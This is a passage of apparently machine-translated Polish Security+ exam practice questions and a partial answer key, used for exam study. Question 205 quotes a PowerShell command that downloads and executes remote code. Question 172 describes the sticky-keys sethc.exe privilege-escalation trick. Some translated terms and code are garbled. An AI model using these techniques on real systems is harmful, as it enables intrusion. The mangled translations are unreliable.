A. IRT
B. ISAC
C. Palniki paszowe
D. Kanały o zagrożeniach wertykalnych
171. Po uruchomieniu nmapa w systemie w sieci, Lucca widzi, że port TCP 23 jest otwarty i działa na nim usługa. Jaki problem powinien zidentyfikować?
A. Niskie porty nie powinny być otwarte na Internet.
B. Telnet to niezabezpieczony protokół.
C. SSH jest niezabezpieczonym protokołem.
D. Porty 1-1024 są dobrze znanymi portami i muszą być zabezpieczone zaporą ogniową.
172. Podczas testu penetracyjnego Cameron uzyskuje fizyczny dostęp do systemu Windows i używa dysku naprawy systemu, aby skopiować cmd.exe do katalogu %systemroot%\system32, jednocześnie zmieniając jego nazwę na sethc.exe . Po uruchomieniu systemu może zalogować się jako nieuprzywilejowany użytkownik, nacisnąć klawisz Shift pięć razy i otworzyć wiersz poleceń z dostępem na poziomie systemu za pomocą lepkich klawiszy. Jaki rodzaj ataku przeprowadził?
A. Atak trojana
B. Atak polegający na eskalacji uprawnień
C. Atak typu "odmowa usługi"
D. Atak wymiany plików
173. Adam chce opisać cyberprzestępców za pomocą wspólnych atrybutów. Który z poniższych list nie jest typowym atrybutem używanym do opisywania cyberprzestępców?
A. Wewnętrzne/zewnętrzne
B. Zasoby lub poziom finansowania
C. Lata doświadczenia
D. Intencja/motywacja
174. Madhuri jest zaniepokojona bezpieczeństwem algorytmów uczenia maszynowego, które wdraża jej organizacja. Która z poniższych opcji nie są powszechnym zabezpieczeniem dla algorytmów uczenia maszynowego?
A. Zapewnienie, że dane źródłowe są bezpieczne i odpowiedniej jakości
B. Wymaganie zewnętrznego przeglądu wszystkich zastrzeżonych algorytmów
C. Wymaganie kontroli zmian i dokumentacji dla wszystkich zmian w algorytmach
D. Zapewnienie bezpiecznego środowiska do rozwoju, gromadzenia i przechowywania danych
175. Frank jest częścią białego zespołu zajmującego się ćwiczeniem z cyberbezpieczeństwa. Co jaką rolę będzie miał on i jego zespół?
A. Sprawowanie nadzoru i ocenianie ćwiczenia
B. Przekazanie uczestnikom pełnych informacji o środowisku
C. Przekazanie uczestnikom częściowych informacji o środowisku
D. Zapewnienie obrony przed napastnikami w ćwiczeniu
176. Susan otrzymuje 10 000 USD za zgłoszenie luki sprzedawcy, który uczestniczy w programie identyfikacji problemów. Jaki termin jest powszechnie używany do opisania tego rodzaju płatności?
A. Okup
B. Dzień wypłaty
C. Nagroda za błąd
D. Ujawnienie dnia zerowego
177. Charles ustawia uprawnienia do katalogu /etc w systemie Linux na 777 za pomocą polecenia chmod. Jeśli Alex później to odkryje, jak powinien zgłosić to odkrycie?
A. Otwarte lub słabe uprawnienia
B. Niewłaściwa obsługa plików
C. Atak polegający na eskalacji uprawnień
D. Żadne z powyższych
178. Podczas testu penetracyjnego Kathleen zbiera informacje, w tym nazwę domeny organizacji, adresy IP, informacje o pracownikach, numery telefonów, adresy e-mail i podobne dane. Jak zwykle nazywa się ten proces?
A. Mapowanie
B. Ślady
C. Odciski palców
D. Agregacja
179. Jakim terminem określa się mapowanie sieci bezprzewodowych podczas jazdy?
A. Wi-jazda
B. Testowanie ruchu
C. Jazda wojenna
D. CARINT
180. Fred odkrywa, że systemy sterowania oświetleniem i mediami w jego firmie zostały przeciążone ruchem wysyłanym do nich z setek zewnętrznych hostów sieciowych. Doprowadziło to do tego, że światła i systemy zarządzania systemem narzędziowym nie otrzymują odpowiednich raportów, a urządzenia końcowe nie mogą odbierać poleceń. Jaki to rodzaj ataku?
A. Przepełnienie SCADA
B. Technologia operacyjna (OT) DDoS
C. Sieciowy atak DDoS
D. Aplikacja DDoS
181. Ben przeprowadza skanowanie luk w zabezpieczeniach przy użyciu aktualnych definicji systemu, o którym wie, ma lukę w uruchomionej wersji Apache. Skanowanie podatności nie pokazuje tego problemu podczas przeglądania raportu. Co spotkał Bena?
A. Cicha łata
B. Brak aktualizacji podatności
C. Fałszywy wynik negatywny
D. Fałszywy wynik pozytywny
182. Jaki rodzaj techniki jest powszechnie stosowany przez twórców złośliwego oprogramowania do zmiany sygnatury złośliwego oprogramowania w celu uniknięcia wykrycia przez narzędzia antywirusowe?
A. Refaktoryzacja
B. Klonowanie
C. Ręczna edycja kodu źródłowego
D. Zmiana języków programowania
183. Jaki termin opisuje strategię wojskową dla wojny politycznej, która łączy wojnę konwencjonalną, wojnę nieregularną i wojnę cybernetyczną z fałszywymi wiadomościami, strategiami wpływania na media społecznościowe, wysiłkami dyplomatycznymi i manipulacją czynnościami prawnymi?
A. Wojna społeczna
B. Wojna hybrydowa
C. Wpływ społeczny
D. Kampanie wpływu cyberspołecznego
184. Chris zostaje poinformowany, że jeden z jego pracowników został ostrzeżony za pomocą wiadomości tekstowej, że FBI wie, że wszedł na nielegalne strony internetowe. Jaki to rodzaj problemu?
A. Próba phishingu
B. Oszustwo związane z tożsamością
C. oszustwo
D. Oszustwo związane z fakturą
185. Sarah przegląda dzienniki swojego serwera internetowego i widzi wpis oznaczony do sprawdzenia, który zawiera następujące żądanie HTTP:
CheckinstockAPI=http://localhost/admin.php
Jaki rodzaj ataku jest najprawdopodobniej podejmowany?
A. Atak cross-site scripting
B. Fałszerstwo żądania po stronie serwera
C. Fałszerstwo żądania po stronie klienta
D. Wstrzyknięcie SQL
186. Angela przegląda biuletyny i porady, aby określić, jakie zagrożenia może napotkać jej organizacja. Z jakim rodzajem działalności jest to związane?
A. Reakcja na incydent
B. Polowanie na zagrożenia
C. Testy penetracyjne
D. Skanowanie podatności
187. Dlaczego atakujący atakują hasła przechowywane w pamięci?
A. Są zaszyfrowane w pamięci.
B. Są haszowane w pamięci.
C. Często są w postaci zwykłego tekstu.
D. Często są odszyfrowywane do użytku.
188. Departament Bezpieczeństwa Wewnętrznego Stanów Zjednoczonych (DHS) zapewnia usługę automatycznego udostępniania wskaźników (AIS), która umożliwia rządowi federalnemu i organizacjom sektora prywatnego udostępnianie danych o zagrożeniach w czasie rzeczywistym. Usługa AIS wykorzystuje protokoły i standardy open source do wymiany tych informacji. Z którego z poniższych standardów korzysta usługa AIS?
A. HTML i HTTPS
B. SFTP i XML
C. STIX i TRIX
D. STIX i TAXII
189. Na jakiej fazie testu penetracyjnego gromadzone są informacje, takie jak nazwiska pracowników, numer telefonu i adresy e-mail?
A. Wyzysk
B. Ustalenie wytrwałości
C. Rekonesans
D. Ruch boczny
190. Podczas testu penetracyjnego Angela zdobywa mundur znanej firmy kurierskiej i zakłada go w docelowym biurze. Twierdzi, że ma przesyłkę dla pracownika wyższego szczebla, o którym wie, że tam jest, i nalega, aby paczka musiała być podpisana przez tę osobę. Jakiej socjotechniki użyła?
A. Podszywanie się
B. Wielorybnictwo
C. Atak wodopoju
D. Oczekiwanie
191. Nick kupuje swoje urządzenia sieciowe za pośrednictwem dostawcy z szarej strefy, który importuje je do swojego regionu bez oficjalnego związku z producentem urządzeń sieciowych. Jakie ryzyko powinien zidentyfikować Nick, oceniając ryzyko w łańcuchu dostaw?
A. Brak wsparcia dostawcy
B. Brak ochrony gwarancyjnej
C. Brak możliwości sprawdzenia źródła urządzeń
D. Wszystkie powyższe
192. Christina chce zidentyfikować wskaźniki ataku na aplikacje internetowe oparte na języku XML, które obsługuje jej organizacja. Gdzie najprawdopodobniej znajdzie informacje, które pomogą jej określić, czy w jej aplikacjach internetowych występuje wstrzykiwanie XML?
A. Syslog
B. Logi serwera WWW
C. Dzienniki uwierzytelniania
D. Dzienniki zdarzeń
193. Co może zrobić Frank, aby ustalić, czy cierpi z powodu ataku typu "odmowa usługi" (DoS) na jego środowisko hostingu w chmurze?
A. Nic; usługi w chmurze nie zapewniają narzędzi bezpieczeństwa.
B. Zadzwoń do dostawcy usług w chmurze, aby powstrzymał atak DoS.
C. Przejrzyj narzędzia bezpieczeństwa dostawcy usług w chmurze i włącz narzędzia do rejestrowania i ochrony przed atakami DoS, jeśli takie istnieją.
D. Zadzwoń do dostawcy usług internetowych (ISP) dostawcy usług w chmurze i poproś go o włączenie ochrony przed atakami DoS.
194. Frank korzysta z usługi publikowania w sieci w chmurze, zamiast prowadzić własne serwery internetowe. Gdzie Frank będzie musiał szukać, aby przejrzeć swoje dzienniki, aby zobaczyć, jakie rodzaje ruchu jest jeg aplikacja się tworzy?
A. Syslog
B. Dzienniki Apache
C. Dzienniki sieciowe usługi w chmurze
D. Żadne z powyższych
195. Gdyby Frank nadal działał w swojej lokalnej infrastrukturze, co z poniższych technologii zapewniłoby najpełniejszy wgląd w rodzaj ataku, który widział?
A. Zapora sieciowa
B. IPS
C. Skaner podatności
D. Oprogramowanie antymalware
196. Alaina chce mieć pewność, że integracja systemu na miejscu, z którą współpracuje jej firma, odbywa się zgodnie z najlepszymi praktykami branżowymi. Które z poniższych nie jest wspólna metoda zapewniania tego?
A. Umieszczanie wymogów bezpieczeństwa w umowach
B. Konfiguracje audytu
C. Koordynacja z dostawcą przeglądów bezpieczeństwa podczas i po instalacji
D. Wymaganie raportu SOC
197. Elias wdrożył narzędzie do analizy ruchu sieciowego oparte na sztucznej inteligencji wymaga to od niego umożliwienia narzędziu monitorowania swojej sieci przez okres dwóch tygodni przed wprowadzeniem do pełnej produkcji. Jaki jest najważniejszy problem, z którym musi się zmierzyć, zanim wykorzysta podstawowe możliwości sztucznej inteligencji?
A. Sieć powinna być izolowana, aby uniemożliwić dodawanie ruchu wychodzącego do normalnych wzorców ruchu.
B. Zainfekowane lub w inny sposób złośliwe maszyny mogą zostać dodane do linii bazowej, co spowoduje skażenie danych treningowych.
C. Wzorce ruchu mogą nie odpowiadać ruchowi w dłuższym okresie czasu.
D. AI może nie rozumieć przepływów ruchu w jego sieci.
198. Jaki jest typowy cel lub cel haktywistów?
A. Zwiększenie ich reputacji
B. Zysk finansowy
C. Składanie oświadczenia politycznego
D. Zbieranie danych o wysokiej wartości
199. Skąd pochodzą informacje do analizy predykcyjnej do analizy zagrożeń?
A. Aktualne trendy bezpieczeństwa
B. Duże zbiory danych bezpieczeństwa
C. Wzorce zachowań
D. Wszystkie powyższe
200. Numery ubezpieczenia społecznego i inne dane osobowe są często kradzione w jakim celu?
A. Szantaż
B. Ściganie
C. Oszustwo dotyczące tożsamości
D. Podszywanie się
200. W jakim celu często kradnie się numery ubezpieczenia społecznego i inne dane osobowe?
A. Szantaż
B. Ściganie
C. Oszustwo dotyczące tożsamości
D. Podszywanie się
201. Narzędzia do orkiestracji bezpieczeństwa, automatyzacji i reagowania (SOAR) składają się z trzech głównych komponentów. Który z poniższych elementów nie jest jednym z tych elementów?
A. Analiza i testowanie bezpieczeństwa kodu źródłowego
B. Zarządzanie zagrożeniami i podatnościami
C. Reakcja na incydent związany z bezpieczeństwem
D. Automatyzacja operacji bezpieczeństwa
202. Bezpośredni dostęp, sieć bezprzewodowa, poczta e-mail, łańcuch dostaw, media społecznościowe, nośniki wymienne i chmura to przykłady czego?
A. Źródła informacji o zagrożeniach
B. Wektory zagrożeń
C. Atrybuty cyberprzestępców
D. Podatności
203. SourceForge i GitHub są przykładami jakiego rodzaju źródła informacji o zagrożeniach?
A. Ciemna sieć
B. Zautomatyzowane źródła udostępniania wskaźników
C. Repozytoria plików lub kodów
D. Centra wymiany informacji publicznych
204. Jaka jest główna przyczyna niewłaściwej obsługi danych wejściowych?
A. Niewłaściwa obsługa błędów
B. Zaufanie zamiast walidacji danych wejściowych
C. Brak świadomości użytkownika
D. Niewłaściwy przegląd kodu źródłowego
205. Claire odkrywa następujący skrypt PowerShell. Co to jest? Co robić?
powershell.exe -ep Pomiń -nop -noexit -c iex
((Nowy ObjectNet.WebClient).
DownloadString('https://example.com/file.psl))
A. Pobiera plik i otwiera zdalną powłokę
B. Przesyła plik i usuwa kopię lokalną
C. Pobiera plik do pamięci
D. Przesyła plik z pamięci
206. IPS Kathleen oznacza ruch z dwóch adresów IP, jak pokazano tutaj:
IP źródła: 10.11.94.111
http://example.com/home/show.php?SESSIONID=a3fghbby
Źródłowy adres IP: 192.168.5.34
http://example.com/home/show.php?SESSIONID=a3fghbby
Jaki rodzaj ataku powinna to zbadać?
A. Atak wstrzykiwania SQL
B. Atak cross-site scripting
C. Atak z powtórką sesji
D. Atak polegający na fałszowaniu żądań po stronie serwera
207. Istnieje siedem kategorii wpływu, które musisz znać, aby zdać egzamin Security+. Które z poniższych nie należy do nich?
A. Naruszenia danych
B. Modyfikacja danych
C. Eksfiltracja danych
D. Utrata danych
208. Które z poniższych źródeł badawczych jest zazwyczaj najmniej na czas, gdy pozyskujesz informacje o zagrożeniach?
A. Kanały podatności
B. Lokalne grupy branżowe
C. Czasopisma naukowe
D. Kanały o zagrożeniach
209. Podczas przeglądania dzienników uwierzytelniania na serwerze, który utrzymuje, Megan zauważa następujące wpisy w dzienniku:
Apr 26 20:01:32 examplesys rshd[6101]: Connection from
10.0.2.15 on illegal port
Apr 26 20:01:48 examplesys rshd[6117]: Connection from
10.0.2.15 on illegal port
Apr 26 20:02:02 examplesys rshd[6167]: Connection from
10.0.2.15 on illegal port
Apr 26 20:02:09 examplesys rshd[6170]: Connection from
10.0.2.15 on illegal port
Apr 26 20:02:09 examplesys rshd[6172]: Connection from
10.0.2.15 on illegal port
Apr 26 20:02:35 examplesys rshd[6188]: Connection from
10.0.2.15 on illegal port
Apr 26 20:02:35 examplesys rlogind[6189]: Connection from
10.0.2.15 on illegal port
Co najprawdopodobniej wykryła?
A. Udana próba włamania
B. Nieudane uruchomienie usługi
C. Skanowanie podatności
D. Ponowne uruchomienie systemu
210. Poniższa grafika przedstawia raport ze skanowania podatności OpenVAS. Co powinien zrobić Charles, aby określić najlepszą poprawkę dla pokazanej luki?
>
A. Wyłącz PHP-CGI.
B. Zaktualizuj PHP do wersji 5.4.
C. Przejrzyj opisy podatności w wymienionych CVE.
D. Wyłącz serwer WWW.
211. Ian uruchamia skanowanie luk w zabezpieczeniach, które zauważa, że usługa działa na porcie TCP 8080. Jaki typ usługi jest najprawdopodobniej uruchomiony na tym porcie?
A. SSH
B. PROW
C. MySQL
D. HTTP
212. Rick uruchamia WPScan przeciwko potencjalnie podatnej na ataki instalacji WordPress. WPScan to skaner bezpieczeństwa aplikacji internetowych zaprojektowany specjalnie dla witryn WordPress. W ramach wyników skanowania , zauważa następujący wpis:
Co powinien zrobić Rick po usunięciu tej luki?
A. Zainstaluj zaporę aplikacji sieciowej.
B. Przejrzyj proces łatania i aktualizacji systemu WordPress.
C. Wyszukaj inne zhakowane systemy.
D. Przejrzyj dzienniki IPS pod kątem ataków na podatną wtyczkę.
213. Carolyn przeprowadza skanowanie pod kątem luk w zabezpieczeniach urządzenia sieciowego i odkrywa, że urządzenie uruchamia usługi na portach TCP 22 i 443. Jakie usługi najprawdopodobniej wykryła?
A. Telnet i serwer WWW
B. FTP i udostępnianie plików Windows
C. SSH i serwer WWW
D. SSH i udział plików Windows
214. Ryan musi sprawdzić, czy w jego systemach nie są dostępne żadne niepotrzebne porty i usługi, ale nie może uruchomić skanera luk w zabezpieczeniach. Jaka jest jego najlepsza opcja?
A. Pasywne przechwytywanie ruchu sieciowego w celu wykrywania usług
B. Przegląd konfiguracji
C. Aktywne przechwytywanie ruchu sieciowego w celu wykrywania usług
D. Przegląd dziennika
215. Dlaczego niewłaściwa obsługa błędów aplikacji internetowych, która powoduje wyświetlanie komunikatów o błędach, jest uważana za lukę, które powinny zostać naprawione?
A. Błędy mogą zostać użyte do zawieszenia systemu.
B. Wiele błędów skutkuje warunkami wyścigu, które można wykorzystać.
C. Wiele błędów dostarcza informacji o systemie hosta lub jego konfiguracji.
D. Błędy mogą zmienić uprawnienia systemowe.
216. Niektórzy użytkownicy w Twojej sieci używają Acme Bank do bankowości osobistej. Wszyscy ci użytkownicy padli ostatnio ofiarą ataku, w ramach którego odwiedzili fałszywą witrynę Acme Bank, a ich loginy zostały naruszone. Wszyscy odwiedzili witrynę banku z Twojej sieci i wszyscy nalegają, aby wpisali poprawny adres URL. Jakie jest najbardziej prawdopodobne wyjaśnienie tej sytuacji?
A. koń trojański
B. Spoofing IP
C. Clickjacking
D. Zatrucie DNS
217. John jest administratorem sieci w firmie Acme. Odkrył, że ktoś zarejestrował nazwę domeny, której pisownia różni się tylko jedną literą od domeny jego firmy. Witryna z błędnym adresem URL jest witryną phishingową. Co najlepiej opisuje ten atak?
A. Przejmowanie sesji
B. Fałszerstwo żądań między witrynami
C. Przysiady literówkowe
D. Clickjacking
Odpowiedzi
1. C. Prawidłowa odpowiedź to spear phishing. Spear phishing jest wymierzony w określoną grupę, w tym przypadku specjalistów ubezpieczeniowych. Chociaż jest to forma phishingu, na tego typu pytania należy wybrać bardziej konkretną odpowiedź. Phishing wykorzystuje techniki socjotechniki, aby odnieść sukces, ale po raz kolejny jest szerszą odpowiedzią niż spear phishing, a zatem nie jest właściwym wyborem. Wreszcie koń trojański udaje legalny lub pożądany program lub plik, którego ten scenariusz nie opisuje.
2. B. Bomba logiczna to złośliwe oprogramowanie, które wykonuje swoją złośliwą aktywność gdy spełniony jest jakiś warunek. Robak to złośliwe oprogramowanie, które samo się rozmnaża. Koń trojański to złośliwe oprogramowanie dołączone do legalnego programu, a rootkit to złośliwe oprogramowanie, które uzyskuje uprawnienia administratora lub administratora.
3. C. Jest to bardzo podstawowa forma wstrzykiwania SQL. Skrypty między witrynami zawierałyby kod JavaScript w polu tekstowym i miałyby wpływać na inne witryny z sesji użytkownika. Fałszowanie żądań między witrynami nie wymagałoby wprowadzania tekstu na stronie internetowej, a zatrucie ARP zmienia tabelę ARP w przełączniku; nie jest to związane z hackowaniem stron internetowych.
4. B. Opisuje atak polegający na zagłuszaniu, w którym legalny ruch jest zakłócany przez inny sygnał. Zagłuszanie może być zamierzone lub niezamierzone i może być przerywane. Ataki IV to niejasne ataki kryptograficzne na szyfry strumieniowe. Konfiguracja chroniona Wi-Fi (WPS) wykorzystuje kod PIN do łączenia się z bezprzewodowym punktem dostępowym (WAP). Atak WPS próbuje przechwycić przesyłany kod PIN, połączyć się z WAP, a następnie ukraść hasło WPA2. Botnet to grupa maszyn, które są wykorzystywane bez ich zgody w ramach ataku.
5. B. Najlepszą wymienioną opcją obrony przed wspomnianymi atakami jest walidacja danych wejściowych. Szyfrowanie ruchu internetowego nie będzie miało żadnego wpływu na te dwa ataki. Zapora aplikacji internetowej (WAF) może złagodzić te ataki, ale byłaby drugorzędna w stosunku do walidacji danych wejściowych, a system wykrywania włamań (IDS) po prostu wykryje atak - nie powstrzyma go.
6. C. Jeśli użytkownicy łączyli się, ale AP nie pokazuje ich połączenia, oznacza to, że łączyli się z fałszywym punktem dostępowym. Może to być przyczyną słabości architektury i projektu, takiej jak sieć bez segmentacji i kontroli urządzeń łączących się z siecią. Przejęcie sesji polega na przejęciu już uwierzytelnionej sesji. Większość ataków polegających na przejmowaniu sesji obejmuje podszywanie się. Atakujący próbuje uzyskać dostęp do sesji innego użytkownika, podszywając się pod tego użytkownika. Clickjacking polega na powodowaniu, że odwiedzający witrynę klikają niewłaściwy element. Wreszcie, bluejacking to atak Bluetooth.
7. C. Cross-site scripting polega na wprowadzeniu skryptu w pola tekstowe, które będą przeglądać inni użytkownicy. SQL injection nie polega na wprowadzaniu skryptów, ale raczej na poleceniach SQL. Clickjacking polega na nakłanianiu użytkowników do kliknięcia niewłaściwej rzeczy. Bluejacking to atak Bluetooth.
8. D. Zachowanie aktualnego hasła nie jest najlepszą praktyką, dlatego szyfrowanie hasła w postaci zwykłego tekstu nie jest powszechną techniką utrudniającą złamanie hasła. Ponieważ aplikacja potrzebowałaby klucza kryptograficznego do odczytania haseł, każdy, kto miał dostęp do tego klucza, mógł odszyfrować hasła. Używanie soli, pieprzu i kryptograficznego algorytmu haszującego zaprojektowanego dla haseł to popularne najlepsze praktyki zapobiegające atakom typu brute-force w trybie offline.
9. A. Chociaż jest to jedna z bardziej przestarzałych pozycji w zarysie egzaminu Security+, musisz wiedzieć, że terminem dla wiadomości spamowych w wiadomościach internetowych jest SPIM. Pozostałe odpowiedzi zostały zmyślone i chociaż widać to w zarysie egzaminu, reszta świata odeszła od używania tego terminu.
10. B. Błąd segmentacji zazwyczaj powoduje zatrzymanie programu. Ten typ problemu jest powodem, dla którego wskaźnik NULL lub inny błąd odwoływania się do wskaźnika jest uważany za potencjalny problem z zabezpieczeniami, ponieważ warunek odmowy usługi wpływa na dostępność usługi. Ten rodzaj błędu prawdopodobnie nie spowoduje naruszenia danych ani nie pozwoli na eskalację uprawnień, a pełzanie uprawnień występuje, gdy osoby z biegiem czasu uzyskują więcej uprawnień w jednej organizacji, ponieważ ich uprawnienia nie są czyszczone po zmianie stanowisk lub ról.
11. C. Maszyny w jej sieci są używane jako boty, a użytkownicy nie są świadomi, że są częścią rozproszonego ataku typu "odmowa usługi" (DDoS). Inżynieria społeczna jest wtedy, gdy ktoś próbuje aby manipulować tobą w udzielaniu informacji. Techniki wykorzystywane w atakach socjotechnicznych obejmują konsensus, niedobór i znajomość. Istnieje niewielka szansa, że wszystkie komputery mogą mieć tylne drzwi, ale jest to bardzo mało prawdopodobne, a atakujący zwykle nie logują się ręcznie na każdym komputerze, aby wykonać atak DDoS - byłoby to zautomatyzowane, jak za pośrednictwem bota.
12. C. Istnieje wiele wskaźników naruszenia bezpieczeństwa (IoC), w tym nietypowy wychodzący ruch sieciowy, nieprawidłowości geograficzne, takie jak logowanie z kraju, w którym dana osoba zwykle nie pracuje, lub wzrost liczby odczytów bazy danych przekraczający normalne wzorce ruchu. Analiza predykcyjna to praca analityczna wykonywana przy użyciu zestawów danych w celu określenia trendów i prawdopodobnych wektorów ataków, tak aby analitycy mogli skoncentrować swoje wysiłki tam, gdzie będą najbardziej potrzebne i skuteczne. OSINT to inteligencja typu open source, a mapy zagrożeń są często wizualizacjami w czasie rzeczywistym lub prawie w czasie rzeczywistym pokazującymi, skąd pochodzą zagrożenia i dokąd zmierzają. Użyj poniższego scenariusza do pytań 13-15. Chris niedawno wdrożył urządzenie do zarządzania informacjami o zabezpieczeniach i zdarzeniami (SIEM) i chce je efektywnie wykorzystywać w swojej organizacji. Wie, że systemy SIEM mają szeroki zakres możliwości i chce wykorzystać te funkcje do rozwiązywania problemów, z którymi zna swoją organizację. W każdym z poniższych pytań określ najbardziej odpowiednią funkcję SIEM lub technika pozwalająca osiągnąć to, co Chris musi zrobić dla swojej organizacji.
13. B. Podczas rozwiązywania problemów związanych z uzgadnianiem TCP, w wielu przypadkach najcenniejszym narzędziem jest przechwytywanie pakietów. Jeśli Chris zobaczy serię pakietów SYN bez zakończenia uzgadniania, może być pewien, że zapora blokuje ruch. Przeglądanie raportów lub dzienników również może być przydatne, ale nie pokaże problemu z uzgadnianiem TCP, o którym mowa w problemie, a analiza sentymentu koncentruje się na reagowaniu poszczególnych osób i grup, a nie na problemie technicznym.
14. D. Analiza zachowania użytkownika jest kluczową umiejętnością podczas próby wykrywania potencjalnych zagrożeń wewnętrznych. Chris może wykorzystać możliwości analizy behawioralnej SIEM do wykrywania niewłaściwego lub nielegalnego korzystania z praw i przywilejów, a także nietypowego zachowania ze strony jego użytkowników. Analiza nastrojów pomaga analizować uczucia, a agregacja dzienników i monitorowanie bezpieczeństwa zapewniają sposoby uzyskania wglądu w ogólny stan bezpieczeństwa i status organizacji.
15. A. Korzystanie z agregacji dzienników w celu zebrania dzienników z wielu źródeł oraz wykonywanie zbierania i wstępnej analizy na urządzeniach zbierających dzienniki może pomóc w scentralizowaniu i obsłudze dużych ilości dzienników. Przechwytywanie pakietów jest przydatne do analizy ruchu sieciowego w celu zidentyfikowania problemów lub problemów związanych z bezpieczeństwem. Monitorowanie bezpieczeństwa to ogólna funkcja służąca do zarządzania informacjami o zabezpieczeniach i zdarzeniami (SIEM) i nie pomaga w zaspokojeniu tej potrzeby. Zarówno analiza sentymentu, jak i analiza zachowań użytkowników są skierowane do użytkowników i grup, a nie do sposobu gromadzenia danych i zarządzania nimi.
16. B. Białe zespoły pełnią rolę sędziów i obserwatorów podczas ćwiczeń z cyberbezpieczeństwa. Drużyny niebieskie działają jako obrońcy, drużyny czerwone działają jako napastnicy, a fioletowe drużyny składają się z obu niebieskich i czerwonych członków zespołu, aby połączyć wiedzę o atakach i obronie w celu poprawy bezpieczeństwa organizacji.
17. A. Najprostszym sposobem zapewnienia, że interfejsy API są używane tylko przez uprawnionych użytkowników, jest wymaganie użycia uwierzytelniania. Klucze API są jedną z najczęściej używanych metod. Jeśli klucz API zostanie zgubiony lub skradziony, klucz może zostać unieważniony i ponownie wydany, a ponieważ klucze API można dopasować do użycia, firma Cynthii może również rozliczać klientów na podstawie ich wzorców użytkowania, jeśli chcą. Zapora sieciowa lub ograniczenia IP mogą pomóc, ale mogą być delikatne; adresy IP klientów mogą ulec zmianie. System zapobiegania włamaniom (IPS) może wykrywać i zapobiegać atakom, ale uzasadnione użycie byłoby trudne do odróżnienia od osób, które nie są klientami korzystającymi z IPS.
18. B. Ataki polegające na przepełnieniu bufora wpychają do pola lub bufora więcej danych niż są w stanie zaakceptować, przepełniając się do innych lokalizacji pamięci i albo powodując awarię systemu lub aplikacji, albo potencjalnie umożliwiając wstawienie kodu do lokalizacji wykonywalnych. Bluesnarfing i bluejacking to ataki Bluetooth. Ataki cross-site scripting umożliwiają atakującym wstrzykiwanie skryptów do stron przeglądanych przez innych użytkowników.
19. A. Atakujący próbują wpłynąć na Gurvindera kombinacją niedostatku i pilności. W związku z tym na to pytanie należy odpowiedzieć na niedobór, ponieważ pilność nie jest wymieniona. W wielu pytaniach dotyczących zasad socjotechniki może mieć znaczenie więcej niż jedna z zasad i będziesz musiał odpowiedzieć, która jest prawidłowa lub bardziej poprawna dla danego pytania. W tym przypadku nie ma zastraszania ani roszczeń do autorytetu, a konsensus wymagałby jakiejś formy potwierdzenia od innych.
20. A. Skany luk w zabezpieczeniach wykorzystują zautomatyzowane narzędzia do wyszukiwania znanych luk w systemach i aplikacjach, a następnie dostarczają raporty pomagające w działaniach naprawczych. Testy penetracyjne mają na celu faktyczne wykorzystanie luk w zabezpieczeniach i włamanie się do systemów. Audyty bezpieczeństwa zwykle skupiają się na sprawdzaniu polityk, raportów o incydentach i innych dokumentów. Test bezpieczeństwa to ogólny termin określający każdy rodzaj testu.
21. C. Złożoność nazwy użytkownika nie ma wpływu na zbieranie poświadczeń. Uwierzytelnianie wieloskładnikowe może pomóc w zapobieganiu udanemu zbieraniu poświadczeń, zapewniając, że nawet przechwycenie nazwy użytkownika i hasła nie wystarczy do naruszenia bezpieczeństwa konta. Szkolenie uświadamiające pomaga zmniejszyć prawdopodobieństwo ujawnienia poświadczeń, a ograniczenie lub uniemożliwienie korzystania ze skryptów internetowych innych firm zmniejsza prawdopodobieństwo, że strony internetowe zostaną skradzione poświadczeniami za pomocą tych skryptów, wtyczek lub modułów.
22. C. Greg może sklonować legalny adres Media Access Control (MAC), jeśli może go zidentyfikować w sieci. Może to być tak proste, jak sprawdzenie etykiety MAC na niektórych urządzeniach lub przechwycenie ruchu w sieci, jeśli ma do niego fizyczny dostęp.
23. A. Z opisu wynika, że nie łączą się z prawdziwym serwerem sieciowym, ale raczej z fałszywym serwerem. Oznacza to squatting literówek: mieć adres URL, który jest nazwany bardzo podobnie do prawdziwej witryny, aby użytkownicy błędnie wpisali adres URL prawdziwej witryny, przeszli na fałszywą witrynę. Wszystkie opcje B, C i D są nieprawidłowe. Są to wszystkie metody atakowania witryny, ale w tym przypadku właściwa witryna nie została zaatakowana. Zamiast tego niektórzy użytkownicy odwiedzają fałszywą witrynę.
24. C. Przejęcie domeny lub kradzież domeny ma miejsce, gdy rejestracja lub inne informacje dotyczące domeny zostaną zmienione bez zgody pierwotnego rejestrującego. Może się to zdarzyć z powodu włamania na konto lub z powodu naruszenia bezpieczeństwa rejestratora domeny. Częstym problemem jest zakup wygasłej domeny przez stronę trzecią, co może wyglądać na przechwyconą domenę, ale jest to uzasadnione zdarzenie, jeśli domena nie zostanie odnowiona! Przejęcie DNS wprowadza fałszywe informacje do serwera DNS, ataki on-path (man-in-the-middle) przechwytują lub modyfikują ruch, powodując jego przejście przez zhakowany punkt środkowy, a ataki typu zero-day to ataki wykorzystujące nieznany do wykorzystana podatność.
25. D. Terminem dla hakerów o niskich kwalifikacjach jest script kiddie. Dzieciaki skryptowe zazwyczaj korzystają z gotowych narzędzi i nie mają doświadczenia w tworzeniu lub modyfikowaniu własnych narzędzi. Nic nie wskazuje na to, że jest to robione z powodów ideologicznych, a co za tym idzie, że w grę wchodzi haktywista. Chociaż "Amator" może być odpowiednim opisem, właściwym określeniem jest script kiddie. Wreszcie, nic w tym scenariuszu nie wskazuje na zagrożenie wewnętrzne.
26. B. Phishing ma na celu pozyskanie danych, najczęściej poświadczeń lub innych informacji, które będą przydatne dla atakującego. Spam to szersze określenie na niechcianą pocztę e-mail, chociaż termin ten jest często używany do opisywania niechcianej komunikacji. Spear phishing jest wymierzony w określone osoby, podczas gdy wielorybnictwo jest skierowane do ważnych osób w organizacji. Smishing wysyłany jest przez SMS (wiadomość tekstowa). Złośliwe oprogramowanie może zostać wysłane w każdym z tych przypadków, ale nie ma konkretnego powiązanego terminu, który oznaczałby "spam zawierający złośliwe oprogramowanie".
27. B. Zbiór komputerów, które zostały zhakowane, a następnie centralnie kontrolowane w celu wykonywania działań, takich jak ataki typu "odmowa usługi", zbieranie danych i inne złośliwe działania, nazywa się botnetem. Zombienets, Nullnets i Attacknets nie są powszechnie używanymi terminami do opisu botnetów.
28. B. Systemy i oprogramowanie, które nie są już wspierane przez dostawcę, mogą stanowić znaczne zagrożenie bezpieczeństwa, a zapewnienie, że dostawca będzie nadal istniał i zapewniał wsparcie, jest ważną częścią wielu procesów zaopatrzenia. Pytania Selah mają na celu ocenę długowieczności i rentowności firmy oraz tego, czy kupowanie od nich spowoduje, że jej organizacja będzie miała produkt użyteczny przez długi czas.
